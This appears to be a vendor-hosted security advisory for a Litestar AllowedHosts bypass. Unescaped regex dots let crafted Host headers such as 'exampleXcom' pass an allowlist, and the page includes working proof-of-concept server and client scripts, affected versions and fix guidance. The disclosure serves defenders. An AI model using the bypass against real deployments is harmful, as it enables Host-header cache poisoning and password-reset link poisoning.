GHSA-93ph-p7v4-hwh4
MEDIUMLitestar's AllowedHosts has a validation bypass due to unescaped regex metacharacters in configured host patterns
EPSS Exploitation Probability
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Blast Radius
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Description
Summary
AllowedHosts host validation can be bypassed because configured host patterns are turned into regular expressions without escaping regex metacharacters (notably .). A configured allowlist entry like example.com can match exampleXcom
Details
In litestar.middleware.allowed_hosts, allowlist entries are compiled into regex patterns in a way that allows regex metacharacters to retain special meaning (e.g., . matches any character). This enables a bypass where an attacker supplies a host that matches the regex but is not the intended literal hostname.
PoC
Server (poc_allowed_hosts_server.py)
from litestar import Litestar, get
from litestar.middleware.allowed_hosts import AllowedHostsConfig
@get("/")
async def index() -> str:
return "ok"
config = AllowedHostsConfig(allowed_hosts=["example.com"])
app = Litestar([index], allowed_hosts_config=config)
uvicorn poc_allowed_hosts_server:app --host 127.0.0.1 --port 8001
Client (poc_allowed_hosts_client.py)
import http.client
def req(host_header: str) -> tuple[int, bytes]:
c = http.client.HTTPConnection("127.0.0.1", 8001, timeout=3)
c.request("GET", "/", headers={"Host": host_header})
r = c.getresponse()
body = r.read()
c.close()
return r.status, body
print("evil.com:", *req("evil.com"))
print("exampleXcom:", *req("exampleXcom"))
Expected (vulnerable behavior): Host: evil.com → 400 invalid host
Host: exampleXcom → 200 ok (bypass)
Impact
Type: security control bypass (host allowlist) Who is impacted: apps relying on AllowedHosts to prevent Host header attacks (cache poisoning, absolute URL construction abuse, password reset link poisoning, etc.). The downstream impact depends on app behavior, but the bypass defeats a core mitigation layer.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | litestar | ≥ 2.19.0&&< 2.20.0 | 2.20.0 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for litestar. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update litestar to 2.20.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-93ph-p7v4-hwh4 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-93ph-p7v4-hwh4 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-93ph-p7v4-hwh4. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-93ph-p7v4-hwh4 in your dependencies?
O3 detects GHSA-93ph-p7v4-hwh4 across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.